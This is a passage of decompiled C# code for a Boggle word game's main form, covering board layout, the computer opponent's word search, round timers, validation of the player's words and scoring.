this.BogBorder7, (Control) this.BogBorder6, (Control) this.BogBorder2, (Control) this.tmrMain, (Control) this.btnFinish, (Control) this.BogBorder5, (Control) this.Panel3, (Control) this.Panel2, (Control) this.Panel1, (Control) this.picCubeDown, (Control) this.lbl16, (Control) this.lbl15, (Control) this.lbl14, (Control) this.lbl13, (Control) this.lbl12, (Control) this.lbl11, (Control) this.lbl10, (Control) this.lbl9, (Control) this.lbl8, (Control) this.lbl7, (Control) this.lbl6, (Control) this.lbl5, (Control) this.lbl2, (Control) this.lbl3, (Control) this.lbl4, (Control) this.lbl1, (Control) this.txtMain, (Control) this.BogBorder4, (Control) this.BogBorder3, (Control) this.BogBorder1, (Control) this.pnlTimer, (Control) this.picCubesUp, (Control) this.pnlScore, (Control) this.pnlWords, (Control) this.CircleLabel1, (Control) this.CircleLabel2, (Control) this.CircleLabel3, (Control) this.PictureBox1, (Control) this.pnlCubes }); this.FormBorderStyle = FormBorderStyle.FixedDialog; this.MaximizeBox = false; this.Menu = this.mnuMain; this.Name = nameof (frmMain); this.Text = "Boggle .Net"; this.ResumeLayout(false); } private void CubeClick(CircleLabel sender, EventArgs e) { VBMath.Randomize(); System.Drawing.Color color; switch (Math.Round((double) (Conversion.Int(VBMath.Rnd() * 6f) + 1f))) { case 1.0: color = System.Drawing.Color.Indigo; break; case 2.0: color = System.Drawing.Color.DarkGreen; break; case 3.0: color = System.Drawing.Color.Crimson; break; case 4.0: color = System.Drawing.Color.Yellow; break; case 5.0: color = System.Drawing.Color.DarkOrange; break; default: color = System.Drawing.Color.Pink; break; } if (StringType.StrCmp(modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeHighLight.ToString(), System.Drawing.Color.Aquamarine.ToString(), false) == 0) { modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeHighLight = System.Drawing.Color.LightGray; modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeTextColor = System.Drawing.Color.DarkBlue; this.ResetCubes(); } else { try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeDownPic = (PictureBox) null; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } if (ObjectType.ObjTst(modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeTopRadius, (object) 55, false) != 0) { this.ResetCubes(); } else { this.ResetCubes(); modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeDownPic = this.picCubeDown; modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].ShowClick(); modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeHighLight = System.Drawing.Color.Aquamarine; modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeTextColor = color; modGlobal.Cubes[checked (IntegerType.FromString(Strings.Mid(sender.Name, 4)) - 1)].CubeLabel.BringToFront(); } } } private void ResetCubes() { this.picCubeDown.Visible = false; try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; if (ObjectType.ObjTst(modGlobal.myCube.CubeTopRadius, (object) 55, false) != 0) { modGlobal.myCube.CubeLabel.SendToBack(); modGlobal.myCube.IsBack = true; modGlobal.myCube.CubeTopRadius = (object) 55; } } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } modGlobal.Cubes[0].CubeTopLeft = (long) checked (this.picCubesUp.Left + 79); int Index1 = 1; do { modGlobal.Cubes[Index1].CubeTopLeft = checked (modGlobal.Cubes[Index1 - 1].CubeTopLeft + modGlobal.Cubes[Index1 - 1].CubeTopWidth + 15L); checked { ++Index1; } } while (Index1 <= 3); modGlobal.Cubes[4].CubeTopLeft = (long) checked (this.picCubesUp.Left + 79); int Index2 = 5; do { modGlobal.Cubes[Index2].CubeTopLeft = checked (modGlobal.Cubes[Index2 - 1].CubeTopLeft + modGlobal.Cubes[Index2 - 1].CubeTopWidth + 15L); checked { ++Index2; } } while (Index2 <= 7); modGlobal.Cubes[8].CubeTopLeft = (long) checked (this.picCubesUp.Left + 79); int Index3 = 9; do { modGlobal.Cubes[Index3].CubeTopLeft = checked (modGlobal.Cubes[Index3 - 1].CubeTopLeft + modGlobal.Cubes[Index3 - 1].CubeTopWidth + 15L); checked { ++Index3; } } while (Index3 <= 11); modGlobal.Cubes[12].CubeTopLeft = (long) checked (this.picCubesUp.Left + 79); int Index4 = 13; do { modGlobal.Cubes[Index4].CubeTopLeft = checked (modGlobal.Cubes[Index4 - 1].CubeTopLeft + modGlobal.Cubes[Index4 - 1].CubeTopWidth + 15L); checked { ++Index4; } } while (Index4 <= 15); int Index5 = 0; do { modGlobal.Cubes[Index5].CubeTopTop = (long) checked (this.picCubesUp.Top + 69); checked { ++Index5; } } while (Index5 <= 3); int Index6 = 4; do { modGlobal.Cubes[Index6].CubeTopTop = checked (modGlobal.Cubes[0].CubeTopHeight + (long) this.picCubesUp.Top + 84L); checked { ++Index6; } } while (Index6 <= 7); int Index7 = 8; do { modGlobal.Cubes[Index7].CubeTopTop = checked (modGlobal.Cubes[4].CubeTopHeight + modGlobal.Cubes[4].CubeTopTop + 14L); checked { ++Index7; } } while (Index7 <= 11); int Index8 = 12; do { modGlobal.Cubes[Index8].CubeTopTop = checked (modGlobal.Cubes[8].CubeTopHeight + modGlobal.Cubes[8].CubeTopTop + 14L); checked { ++Index8; } } while (Index8 <= 15); try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; if (modGlobal.myCube.IsBack) { modGlobal.myCube.IsBack = false; modGlobal.myCube.CubeLabel.BringToFront(); } } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } } private void frmMain_Load(object sender, EventArgs e) { this.Left = checked ((int) Math.Round(unchecked ((double) Screen.PrimaryScreen.Bounds.Width / 2.0 - (double) this.Width / 2.0))); this.Top = checked ((int) Math.Round(unchecked ((double) Screen.PrimaryScreen.Bounds.Height / 2.0 - (double) this.Height / 2.0))); int num = 0; do { Cube Cube = new Cube(); modGlobal.Cubes.Add(Cube); checked { ++num; } } while (num <= 15); this.FindWordsThread = new Thread(new ThreadStart(this.FindAllWords)); this.ShowWordThread = new Thread(new ThreadStart(this.ShowWord)); modGlobal.Cubes[0].CubeLabel = this.lbl1; modGlobal.Cubes[1].CubeLabel = this.lbl2; modGlobal.Cubes[2].CubeLabel = this.lbl3; modGlobal.Cubes[3].CubeLabel = this.lbl4; modGlobal.Cubes[4].CubeLabel = this.lbl5; modGlobal.Cubes[5].CubeLabel = this.lbl6; modGlobal.Cubes[6].CubeLabel = this.lbl7; modGlobal.Cubes[7].CubeLabel = this.lbl8; modGlobal.Cubes[8].CubeLabel = this.lbl9; modGlobal.Cubes[9].CubeLabel = this.lbl10; modGlobal.Cubes[10].CubeLabel = this.lbl11; modGlobal.Cubes[11].CubeLabel = this.lbl12; modGlobal.Cubes[12].CubeLabel = this.lbl13; modGlobal.Cubes[13].CubeLabel = this.lbl14; modGlobal.Cubes[14].CubeLabel = this.lbl15; modGlobal.Cubes[15].CubeLabel = this.lbl16; this.ResetCubes(); modGlobal.Cubes.CubesPicBox = this.picCubesUp; this.ShowDisplayText("", false, false, 0); this.ChangeMode((object) this.mnuVsMode, new EventArgs()); this.ChangeLevel((object) this.mnuLevelMedium, new EventArgs()); this.ChangeTimerInterval((object) this.mnuTmr300, new EventArgs()); this.mnuEnableWordValidation.Checked = true; } public void ScanLetters() { modGlobal.cmdBog.CommandText = "Delete From PossibleLetters"; modGlobal.conBoggle.Open(); modGlobal.cmdBog.ExecuteNonQuery(); modGlobal.conBoggle.Close(); int num = 0; do { while (true) { int nextLetterSquare = this.FindNextLetterSquare(num); if (nextLetterSquare != -1) { modGlobal.conBoggle.Open(); modGlobal.cmdBog.CommandText = "Insert Into PossibleLetters (BaseLetterSquare,BaseLetter,FriendLetterSquare,FriendLetter) Values (" + StringType.FromInteger(num) + ",'" + modGlobal.Cubes[num].CubeLetter + "'," + StringType.FromInteger(nextLetterSquare) + ",'" + modGlobal.Cubes[nextLetterSquare].CubeLetter + "')"; modGlobal.cmdBog.ExecuteNonQuery(); modGlobal.conBoggle.Close(); } else break; } checked { ++num; } } while (num <= 15); this.FindNextLetterSquare(-100); } public int FindNextLetterSquare(int LetterSquare) { if (this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init.State != (short) 1) { Monitor.Enter((object) this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init); try { if (this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init.State == (short) 0) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init.State = (short) 2; this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection = new bool[16, 9]; } else if (this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init.State == (short) 2) throw new IncompleteInitialization(); } finally { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init.State = (short) 1; Monitor.Exit((object) this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init); } } int nextLetterSquare; if (LetterSquare == -100) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection = new bool[16, 9]; } else { int num; if (Strings.InStr(",0,1,2,3,7,11,15,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 7]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 7] = true; num = checked (LetterSquare - 3); } else if (Strings.InStr(",3,7,11,15,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 0]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 0] = true; num = checked (LetterSquare + 1); } else if (Strings.InStr(",3,7,11,15,14,13,12,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 1]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 1] = true; num = checked (LetterSquare + 5); } else if (Strings.InStr(",12,13,14,15,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 2]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 2] = true; num = checked (LetterSquare + 4); } else if (Strings.InStr(",0,4,8,12,13,14,15,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 3]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 3] = true; num = checked (LetterSquare + 3); } else if (Strings.InStr(",0,4,8,12,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 4]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 4] = true; num = checked (LetterSquare - 1); } else if (Strings.InStr(",0,4,8,12,1,2,3,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 5]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 5] = true; num = checked (LetterSquare - 5); } else if (Strings.InStr(",0,1,2,3,", "," + StringType.FromInteger(LetterSquare) + ",") == 0 & !this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 6]) { this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection[LetterSquare, 6] = true; num = checked (LetterSquare - 4); } else num = -1; nextLetterSquare = num; } return nextLetterSquare; } private void FindAllWords() { this.mnuEndGame.Enabled = false; this.ScanLetters(); string Word; this.FoundWords = modFindWords.FindWords(modFindWords.FindMode.AllWords, Word); string sLeft; switch (modGlobal.GameMode) { case modGlobal.Mode.Vs: sLeft = "\r\nComputer: I found all my words!"; break; } VBMath.Randomize(); int num1; switch (modGlobal.GameLevel) { case modGlobal.Level.Easy: num1 = checked ((int) Math.Round((double) unchecked (Conversion.Int(VBMath.Rnd() * 8f) + 1f))); break; case modGlobal.Level.Medium: num1 = checked ((int) Math.Round((double) unchecked (Conversion.Int(VBMath.Rnd() * 15f) + 1f))); break; case modGlobal.Level.Hard: num1 = checked ((int) Math.Round((double) unchecked (Conversion.Int(VBMath.Rnd() * 30f) + 1f))); break; case modGlobal.Level.Impossible: num1 = checked ((int) Math.Round((double) unchecked (Conversion.Int(VBMath.Rnd() * 5000f) + 1f))); break; } if (this.FoundWords.Rows.Count > num1) { int num2 = num1; int index1 = 0; while (index1 <= num2) { bool flag; while (!flag) { flag = true; VBMath.Randomize(); int index2 = checked ((int) Math.Round((double) unchecked (Conversion.Int(VBMath.Rnd() * (float) this.FoundWords.Rows.Count) + 0.0f))); int num3 = Information.UBound((Array) this.WordsChosen); int index3 = 0; while (index3 <= num3) { if (ObjectType.ObjTst((object) this.WordsChosen[index3], this.FoundWords.Rows[index2][0], false) == 0) flag = false; checked { ++index3; } } } this.WordsChosen = (string[]) Utils.CopyArray((Array) this.WordsChosen, (Array) new string[checked (index1 + 1)]); this.WordsChosen[index1] = StringType.FromObject(this.FoundWords.Rows[index1][0]); flag = false; checked { ++index1; } } } else { int num4 = checked (this.FoundWords.Rows.Count - 1); int index = 0; while (index <= num4) { this.WordsChosen = (string[]) Utils.CopyArray((Array) this.WordsChosen, (Array) new string[checked (index + 1)]); this.WordsChosen[index] = StringType.FromObject(this.FoundWords.Rows[index][0]); checked { ++index; } } } this.lstCompFoundWords.Refresh(); if (StringType.StrCmp(sLeft, "", false) == 0) sLeft = "\r\nComputer: I found " + StringType.FromInteger(Information.UBound((Array) this.WordsChosen)) + " words!"; this.txtMain.Text += sLeft; this.mnuEndGame.Enabled = true; this.btnFinish.BogButtonEnabled = true; } private void ShowWord() { try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeHighLight = System.Drawing.Color.LightGray; modGlobal.myCube.CubeTextColor = System.Drawing.Color.DarkBlue; modGlobal.myCube.CubeDownPic = (PictureBox) null; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } string str; try { foreach (DataRow row in (InternalDataCollectionBase) this.FoundWords.Rows) { if (ObjectType.ObjTst(row["FoundWord"], (object) modGlobal.Cubes.WordToShow, false) == 0) { str = StringType.FromObject(row["FoundWordSquares"]); break; } } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } int num1 = Strings.Len(modGlobal.Cubes.WordToShow); if (Strings.InStr(Strings.UCase(modGlobal.Cubes.WordToShow), "Q") != 0) num1 = checked (Strings.Len(modGlobal.Cubes.WordToShow) - 1); int num2 = num1; int num3 = 1; while (num3 <= num2) { int Index; if (Strings.InStr(str, ",") == 0) { Index = IntegerType.FromString(str); } else { Index = IntegerType.FromString(Strings.Mid(str, 1, checked (Strings.InStr(str, ",") - 1))); str = Strings.Mid(str, checked (Strings.InStr(str, ",") + 1)); } modGlobal.Cubes[Index].CubeHighLight = System.Drawing.Color.Aquamarine; modGlobal.Cubes[Index].CubeTextColor = System.Drawing.Color.Red; this.ResetCubes(); try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeDownPic = (PictureBox) null; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } modGlobal.Cubes[Index].CubeDownPic = this.picCubeDown; modGlobal.Cubes[Index].ShowClick(); Thread.Sleep(100); checked { ++num3; } } this.ResetCubes(); modGlobal.Cubes.WordToShow = ""; } private void picCubesUp_Paint(object sender, PaintEventArgs e) => modGlobal.Cubes.DrawCubes(e, modGlobal.Cubes.CubesState); private void btnAddWord_Click(object sender, EventArgs e) { if (Strings.Len(Strings.Trim(this.txtWordFound.Text)) > 2) { this.lstHumanWordsFound.Items.Add((object) this.txtWordFound.Text); this.lblHumanWordsCount.Text = StringType.FromInteger(this.lstHumanWordsFound.Items.Count); this.txtWordFound.Text = ""; } this.txtWordFound.Focus(); } private void ShowText() { int num1; int num2; if (modGlobal.Cubes.DisplayTextFadeOut) { num1 = modGlobal.Cubes.DisplayTextMaxSize; int num3 = checked (modGlobal.Cubes.DisplayTextMaxSize + 100); num2 = checked ((int) Math.Round(unchecked ((double) num1 / 2.0))); } else { num1 = checked ((int) Math.Round(unchecked ((double) modGlobal.Cubes.DisplayTextMaxSize / 2.0))); num2 = checked (num1 + 100); } modGlobal.Cubes.CubesState = CubesCollection.StateOfCubes.Text; int num4 = num1; int num5 = 1; while (num5 <= num4) { this.Show(); if (num5 == num2) Thread.Sleep(1000); this.picCubesUp.Refresh(); checked { ++num5; } } if (modGlobal.Cubes.DisplayTextFadeOut) { modGlobal.Cubes.DisplayText = ""; this.picCubesUp.Refresh(); } if (modGlobal.Cubes.DisplayTextStartUp) { modGlobal.Cubes.ShowSpinStartUp(); while (modGlobal.Cubes.CubesAreSpinning) Application.DoEvents(); this.btnScramble.BogButtonEnabled = true; this.txtMain.Text = "5 seconds to re-scramble letters"; } this.ShowTextThread.Suspend(); } private void txtWordFound_KeyPress(object sender, KeyPressEventArgs e) { if (!(StringType.StrCmp(Strings.Mid(StringType.FromChar(e.KeyChar), 1, 3), "\r", false) == 0 & this.btnAddWord.BogButtonEnabled)) return; this.btnAddWord_Click((object) this, new EventArgs()); } private void tmrContMain_Tick(object sender, EventArgs e) { checked { ++this.\u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024LoadWaitTime; } if (!this.LoadTextShown & this.\u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024LoadWaitTime == 5) { this.LoadTextShown = true; this.ShowDisplayText("Welcome\r\n to\r\n Boggle", false, false, 160); this.tmrContMain.Enabled = false; this.mnuGame.Enabled = true; this.mnuOptions.Enabled = true; this.mnuHelp.Enabled = true; OleDbCommand oleDbCommand = new OleDbCommand("Select ShowForm From ShowWelcome", modGlobal.conBoggle); modGlobal.conBoggle.Open(); OleDbDataReader oleDbDataReader = oleDbCommand.ExecuteReader(); oleDbDataReader.Read(); if (ObjectType.ObjTst(oleDbDataReader["ShowForm"], (object) 0, false) == 0) new frmWelcome().Show(); oleDbDataReader.Close(); modGlobal.conBoggle.Close(); } else { if (!this.LoadTextShown) return; if (Strings.InStr(Strings.UCase(this.txtMain.Text), "RE-SCRAMBLING") != 0) { this.ScramSec = 5.0; this.txtMain.Text = "5 seconds to re-scramble letters"; } else if (Strings.InStr(Strings.UCase(this.txtMain.Text), "RE-SCRAMBLE") != 0) { if (this.ScramSec % 1.0 == 0.0) this.txtMain.Text = StringType.FromDouble(this.ScramSec) + " seconds to re-scramble letters"; this.ScramSec -= 0.5; if (this.ScramSec != 0.0) return; this.btnScramble.BogButtonEnabled = false; this.btnContinue.BogButtonEnabled = false; this.txtMain.Text = ""; this.ScramSec = 5.0; string str = this.StartLevel(false); this.Min = IntegerType.FromString(Strings.Mid(str, 1, 1)); this.Sec = DoubleType.FromString(Strings.Mid(str, 2)); this.\u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024TimerGoing = true; } else if (this.\u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024TimerGoing) { this.Sec -= 0.5; if (this.Sec < 0.0) { if (this.Min == 0) { this.\u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024TimerGoing = false; this.btnScramble.BogButtonEnabled = false; this.Sec = 60.0; this.Min = 2; this.EndLevel(); return; } checked { --this.Min; } this.Sec = 59.0; } string str = StringType.FromDouble(this.Sec); if (this.Sec < 10.0) str = "0" + StringType.FromDouble(this.Sec); if (this.Sec % 1.0 == 0.0) this.tmrMain.TimerText = StringType.FromInteger(this.Min) + str; } } } private void tmrBtn1_Click(object sender, EventArgs e) { object o1 = LateBinding.LateGet(sender, (System.Type) null, "name", new object[0], (string[]) null, (bool[]) null); if (ObjectType.ObjTst(o1, (object) "tmrBtn1", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(0, 70, 0); this.tmrMain.LedOnColor = System.Drawing.Color.LawnGreen; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn2", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(0, 0, 70); this.tmrMain.LedOnColor = System.Drawing.Color.DeepSkyBlue; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn3", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Aquamarine; this.tmrMain.LedOffColor = System.Drawing.Color.LightCyan; this.tmrMain.LedOnColor = System.Drawing.Color.Teal; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn4", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(70, 0, 0); this.tmrMain.LedOnColor = System.Drawing.Color.Red; } this.btnAddWord.Focus(); } private void ShowDisplayText( string Text, bool FadeOut, bool StartUp, int MaxSize, int PositionOffSet = 0) { try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeLabel.Visible = false; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } if (StringType.StrCmp(modGlobal.Cubes.DisplayText, "", false) != 0) this.ShowTextThread.Suspend(); this.ShowTextThread = new Thread(new ThreadStart(this.ShowText)); modGlobal.Cubes.DisplayTextFadeOut = FadeOut; modGlobal.Cubes.DisplayTextStartUp = StartUp; modGlobal.Cubes.DisplayTextMaxSize = MaxSize; modGlobal.Cubes.DisplayPosition = PositionOffSet; modGlobal.Cubes.DisplayText = Text; modGlobal.Cubes.CubesState = CubesCollection.StateOfCubes.Clear; this.picCubesUp.Refresh(); this.ShowTextThread.Start(); } private void mnuNewGame_Click(object sender, EventArgs e) { if (this.ShowTextThread.ThreadState == System.Threading.ThreadState.Running) this.ShowTextThread.Suspend(); this.LoadTextShown = true; this.mnuEndGame.Enabled = true; this.mnuNewGame.Enabled = false; this.mnuOptions.Enabled = false; this.picCubeDown.Visible = false; try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeHighLight = System.Drawing.Color.LightGray; modGlobal.myCube.CubeTextColor = System.Drawing.Color.DarkBlue; modGlobal.myCube.CubeDownPic = (PictureBox) null; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } this.txtMain.Text = ""; this.tmrContMain.Enabled = false; this.lstCompFoundWords.Items.Clear(); this.lstHumanWordsFound.Items.Clear(); this.ShowDisplayText(" Get\r\nReady!", true, true, 180); this.StartLevel(true); while (this.ShowTextThread.ThreadState != System.Threading.ThreadState.Suspended) Application.DoEvents(); this.txtWordFound.Focus(); this.tmrContMain.Enabled = true; } private string StartLevel(bool JustObj) { string str1; bool flag; switch (modGlobal.GameMode) { case modGlobal.Mode.Vs: str1 = "Try to find more words than me before time runs out.\r\nGood luck, your gonna need it!"; flag = true; break; case modGlobal.Mode.BoardGame: str1 = "Players: find as many words as you can before time runs out. Good luck!"; flag = false; break; } this.lblHumanWordsCount.Text = "0"; this.lblCompWordsCount.Text = "0"; this.txtMain.Text = str1; this.tmrMain.TimerText = Strings.Replace(Strings.Mid(modGlobal.TimerInterval.ToString(), 3), "c", ""); string str2; if (!JustObj) { checked { ++this.Round; } this.lblRound.Text = StringType.FromInteger(this.Round); this.txtMain.Text += "\r\nComputer: Finding Words..."; this.FindWordsThread = new Thread(new ThreadStart(this.FindAllWords)); this.FindWordsThread.Start(); this.btnAddWord.BogButtonEnabled = flag; str2 = Strings.Replace(Strings.Mid(modGlobal.TimerInterval.ToString(), 3), "c", ""); } return str2; } private void EndLevel() { int num1 = Information.UBound((Array) this.WordsChosen); int index1 = 0; while (index1 <= num1) { this.lstCompFoundWords.Items.Add((object) this.WordsChosen[index1]); this.lblCompWordsCount.Text = StringType.FromInteger(this.lstCompFoundWords.Items.Count); checked { ++index1; } } this.btnContinue.BogButtonEnabled = true; this.txtWordFound.Text = ""; int num2; switch (modGlobal.GameMode) { case modGlobal.Mode.Vs: num2 = -1; this.btnAddWord.BogButtonEnabled = false; break; case modGlobal.Mode.BoardGame: this.txtMain.Text = "Time is up! Tally up your points!\r\n\r\nClick \"Continue\" To Re-Start!"; return; } if (this.lstHumanWordsFound.Items.Count < num2) { this.txtMain.Text = "Sorry, you did not find " + StringType.FromInteger(num2) + " words.\r\nGame over...\r\nTry again!!"; this.ShowDisplayText("GAME\r\nOVER", false, false, 180); } else { int num3 = checked (this.lstHumanWordsFound.Items.Count - 1); int index2 = 0; int num4; string str1; while (index2 <= num3) { bool flag = true; int num5 = checked (this.lstCompFoundWords.Items.Count - 1); int index3 = 0; while (index3 <= num5) { if (ObjectType.ObjTst(this.lstHumanWordsFound.Items[index2], this.lstCompFoundWords.Items[index3], false) == 0) flag = false; checked { ++index3; } } if (flag) { checked { ++num4; } str1 = StringType.StrCmp(str1, "", false) != 0 ? StringType.FromObject(ObjectType.StrCatObj((object) str1, ObjectType.StrCatObj((object) ",", this.lstHumanWordsFound.Items[index2]))) : StringType.FromObject(ObjectType.StrCatObj((object) str1, this.lstHumanWordsFound.Items[index2])); } checked { ++index2; } } string str2 = Strings.Replace(str1, "\r\n", ""); if (this.mnuEnableWordValidation.Checked & StringType.StrCmp(str2, (string) null, false) != 0) { this.txtMain.Text = "Validating Your Words..."; Application.DoEvents(); string str3 = modFindWords.ValidateWords(str2); if (StringType.StrCmp(str3, (string) null, false) != 0) { int num6 = (int) MessageBox.Show("You have entered words that are impossible to make from the current letter configuration.\r\nThese words will be removed from the score calculation and excluded from your unique word list.\r\n\r\nInvalid words: " + Strings.Mid(str3, 1, checked (Strings.Len(str3) - 1)), "Impossible Words Found", MessageBoxButtons.OK); while (StringType.StrCmp(str3, "", false) != 0) { checked { --num4; } string Find = Strings.Mid(str3, 1, checked (Strings.InStr(str3, ",") - 1)); str3 = Strings.Mid(str3, checked (Strings.InStr(str3, ",") + 1)); str2 = Strings.Replace(Strings.Replace(str2, Find + ",", ""), Find, ""); } } } int num7 = this.ScoreWords(str2); int num8 = num7; checked { this.HumanScore += num7; } this.lblHumanScore.Text = StringType.FromDouble(Conversion.Val(this.lblHumanScore.Text) + (double) num7); this.txtMain.Text = "Your unique words: " + str2; RichTextBox txtMain1 = this.txtMain; txtMain1.Text = txtMain1.Text + "\r\nYou found " + StringType.FromInteger(this.lstHumanWordsFound.Items.Count) + " total words."; RichTextBox txtMain2 = this.txtMain; txtMain2.Text = txtMain2.Text + "\r\nYou found " + StringType.FromInteger(num4) + " unique words."; string str4 = ""; int num9 = 0; int num10 = checked (this.lstCompFoundWords.Items.Count - 1); int index4 = 0; while (index4 <= num10) { bool flag = true; int num11 = checked (this.lstHumanWordsFound.Items.Count - 1); int index5 = 0; while (index5 <= num11) { if (ObjectType.ObjTst(this.lstCompFoundWords.Items[index4], this.lstHumanWordsFound.Items[index5], false) == 0) flag = false; checked { ++index5; } } if (flag) { checked { ++num9; } str4 = StringType.StrCmp(str4, "", false) != 0 ? StringType.FromObject(ObjectType.StrCatObj((object) str4, ObjectType.StrCatObj((object) ",", this.lstCompFoundWords.Items[index4]))) : StringType.FromObject(ObjectType.StrCatObj((object) str4, this.lstCompFoundWords.Items[index4])); } checked { ++index4; } } string Words = Strings.Replace(str4, "\r\n", ""); RichTextBox txtMain3 = this.txtMain; txtMain3.Text = txtMain3.Text + "\r\nMy unique words: " + Words; RichTextBox txtMain4 = this.txtMain; txtMain4.Text = txtMain4.Text + "\r\nI found " + StringType.FromInteger(this.lstCompFoundWords.Items.Count) + " total words."; RichTextBox txtMain5 = this.txtMain; txtMain5.Text = txtMain5.Text + "\r\nI found " + StringType.FromInteger(num9) + " unique words."; int num12 = this.ScoreWords(Words); int num13 = num12; checked { this.ComputerScore += num12; } this.lblCompScore.Text = StringType.FromDouble(Conversion.Val(this.lblCompScore.Text) + (double) num12); if (num13 > num8) { this.lblComputerRounds.Text = StringType.FromDouble(Conversion.Val(this.lblComputerRounds.Text) + 1.0); checked { ++this.ComputerRounds; } } else { this.lblHumanRounds.Text = StringType.FromDouble(Conversion.Val(this.lblHumanRounds.Text) + 1.0); checked { ++this.HumanRounds; } } } } public int ScoreWords(string Words) { if (Strings.Len(Words) == 0) return 0; Words += ","; int num; while (StringType.StrCmp(Words, "", false) != 0) { string Expression = Strings.Mid(Words, 1, checked (Strings.InStr(Words, ",") - 1)); Words = Strings.Mid(Words, checked (Strings.InStr(Words, ",") + 1)); switch (Strings.Len(Expression)) { case 3: checked { ++num; } break; case 4: checked { num += 2; } break; case 5: checked { num += 3; } break; default: checked { num += 4; } break; } } return num; } private void tmrBtn1_Click_1(object 